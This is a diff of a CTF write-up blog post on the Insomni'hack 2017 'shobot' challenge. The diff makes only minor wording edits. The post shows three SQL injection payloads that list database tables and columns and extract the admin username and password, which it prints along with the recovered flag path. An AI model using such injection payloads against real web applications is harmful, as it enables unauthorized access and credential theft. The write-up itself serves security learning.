mtps3/Mtps3.github.io/_posts/2017-01-22-insomnihack-shobot.md

 From here, it was more or less a straightforward SQLi:

-1. Finding the right table:
+- 1. Finding the right table:

 ```
 artid=' AND 1=2 UNION SELECT 1,2,3,TABLE_NAME,5 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%user%' ORDER BY rand(); -- x"
 ```

-2. Finding the right columns:
+- 2. Finding the right columns:

 ```
 artid=' AND 1=2 UNION SELECT 1,2,3,COLUMN_NAME,5 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME =
 'shbt_user' ORDER BY rand(); -- x
 ```

-3. Extracting the admin's username and pw:
+- 3. Extracting the admin's username and pw:

 ```
 artid=' AND 1=2 UNION SELECT 1,2,3,shbt_userpassword,shbt_username FROM shbt_user ORDER BY rand(); -- x"}
 ```

-Which gave us *sh0b0t4dm1n* with the pw *N0T0R0B0TS$L4V3Ry* of the columns *shbt_username* and *shbt_userpasswordin* in the table *shbt_user*.
-Note that we used, for convenience reasons, *ORDER BY rand()* in our injections.
+Which gave us *sh0b0t4dm1n* with the pw *N0T0R0B0TS$L4V3Ry* of the columns *shbt_username* and *shbt_userpassword* in the table *shbt_user*.
+Note, that we used, for convenience, *ORDER BY rand()* in our injections.
 Luckily we did not need many tries ;)

-Now, we just navigated to the admin's login page (http://shobot.teaser.insomnihack.ch/?page=admin), which was stated also in the page's source and read the flag on the web page :)
+Now, we just navigated to the admin's login page (http://shobot.teaser.insomnihack.ch/?page=admin), which was also stated in the page's source and read the flag on the web page :)

 ```